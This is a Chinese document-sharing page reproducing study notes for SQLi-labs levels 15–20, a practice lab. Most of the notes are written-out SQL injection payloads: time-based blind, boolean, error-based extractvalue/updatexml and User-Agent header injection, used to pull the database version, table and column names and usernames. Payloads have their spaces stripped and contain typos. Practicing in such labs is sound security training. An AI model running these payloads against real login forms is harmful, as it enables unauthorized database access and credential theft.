收藏
下载资源下载资源 加入VIP,免费下载

lxsqli labs.docx

上传人:b****8 文档编号:10820361 上传时间:2023-02-23 格式:DOCX 页数:22 大小:8.54MB
下载 相关 举报
lxsqli labs.docx_第1页
第1页 / 共22页
lxsqli labs.docx_第2页
第2页 / 共22页
lxsqli labs.docx_第3页
第3页 / 共22页
lxsqli labs.docx_第4页
第4页 / 共22页
lxsqli labs.docx_第5页
第5页 / 共22页
点击查看更多>>
下载资源
资源描述

lxsqli labs.docx

《lxsqli labs.docx》由会员分享,可在线阅读,更多相关《lxsqli labs.docx(22页珍藏版)》请在冰豆网上搜索。

lxsqli labs.docx

lxsqlilabs

SQLILABS15

1、判断注入点(uname=1'or1=2#&passwd=1&submit=Submit)

2、判断数据库版本

(uname=admin'andif(left(version(),1)=4,0,sleep(10))#&passwd=11&submit)#错误版本

(uname=admin'andif(left(version(),1)=5,0,sleep(10))#&passwd=11&submit)#正确版本

3、判断数据库库名的长度

(uname=admin'andif(length(database())=7,0,sleep(10))#&passwd=11&submit)#错误长度

(uname=admin'andif(length(database())=8,0,sleep(10))#&passwd=11&submit)#正确长度

4、猜库名的首字母

(uname=admin'andif(left(database(),1)>'a',0,sleep(10))#&passwd=11&submit)#错误首字母

(uname=admin'andif(left(database(),1)>'s',0,sleep(10))#&passwd=11&submit)#正确首字母

猜测第二个字符

5、猜测数据库中表名首字母

(uname=admin'andif(ascii(substr((selecttable_namefrominformation_schema.tableswheretable_schema='security'limit0,1),1,1))>100,1,sleep(10))#&passwd=11&submit)

6、查询数据库表中的列

(uname=admin'andif(ascii(substr(1=(select1frominformation_schema.columnswheretable_name='users'andcolumn_nameregexp'^usernam[a-d]'limit0,1),1,1)),1,sleep(8))#&passwd=admin&submit)

7、猜测数据库表中列中字段信息

(uname=admin'andif(ascii(substr((selectusernamefromuserslimit0,1),1,1))>68,1,sleep(8))#&passwd=admin&submit)

SQLILABS16

1、判断注入点

#uname=admin")and1=2#&passwd=admin&submit

2、判断数据库的版本

#uname=admin")andleft(version(),1)=5#&passwd=admin&submit

3、判断数据库库名的长度

#uname=admin")andlength(database())=8#&passwd=admin&submit

4、猜测数据库库名的首字母

#uname=admin")andleft(database(),1)>'s'#&passwd=admin&submit

5、猜测数据库内的表

#uname=admin")andascii(substr((selecttable_namefrominformation_schema.tableswheretable_schema=database()limit0,1),1,1))>101#&passwd=admin&submit

6、猜测数据库的表内的列名

#uname=1")orif(ascii(substr(1=(selectcolumn_namefrominformation_schema.columnswheretable_name='users'andcolumn_nameregexp'^usernam[e]'limit0,1),1,1)),1,sleep(9))#&passwd=1&submit=Submit

7、猜测数据库内表的列内字段

#uname=1")orif(ascii(substr((selectusernamefromuserslimit0,1),1,1))>111,1,sleep(10))#&passwd=1&submit=Submit

SQLILABS17

查询数据库版本

#uname=admin&passwd=11'andextractvalue(1,concat(0x7e,(select@@version),0x7e))#&submit=Submit

查询数据库库名

#uname=admin&passwd=11'andextractvalue(1,concat(0x7e,(select@@version),0x7e))#&submit=Submit

查询数据库库内的表名

#uname=admin&passwd=11'andextractvalue(1,concat(0x7e,(selecttable_namefrominformation_schema.tableswheretable_schema='security'limit2,1),0x7e))#&submit=Submit

查询数据库内表内的列

#uname=admin&passwd=11'andextractvalue(1,concat(0x7e,(selectcolumn_namefrominformation_schema.columnswheretable_name='users'limit9,1),0x7e))#&submit=Submit

查询数据库表中的列的字段信息

#uname=admin&passwd=123'AND(select1from(selectcount(*),(concat("~",(selectusernamefromuserslimit0,1),"~",floor(rand()*2)))namefrominformation_schema.tablesgroupbyname)b)#&submit=Submit

SQLILABS18

判断当前数据库名

#'orupdatexml(1,concat(0x7e,(SELECTdatabase()),0x7e),1),1,1)#

判断数据库的版本号:

#在原本的User-Agent后加上:

’orupdatexml(1,concat(0x7e,(SELECT@@version),0x7e),1),1,1)#

判断数据库的表名

#'orupdatexml(1,concat(0x7e,(selecttable_namefrominformation_schema.tableswheretable_schema=database()limit0,1),0x7e),1),1,1)#

判断users表第一字段

#'orupdatexml(1,concat(0x7e,(selectcolumn_namefrominformation_schema.columnswheretable_schema=database()andtable_name='usersd'limit0,1),0x7e),1),1,1)#

判断users表第二字段

#'orupdatexml(1,concat(0x7e,(selectcolumn_namefrominformation_schema.columnswheretable_schema=database()andtable_name='users'limit1,1),0x7e),1),1,1)#

判断users表中的username第一个

orupdatexml(1,concat(0x7e,(selectusernamefromusreslimit0,1),0x7e),1),1,1)#

SQLILABS19

判断数据库的版本

判断数据库库名

判断数据库的第四个表

判断user表的第一列

判断users表的第二列

查询字段信息

SQLILABS20

判断数据库的版本

判断数据库的库名

判断数据库的所有库

判断suecurity库内的表

判断users表中的列

判断列的内容

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 成人教育 > 成考

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1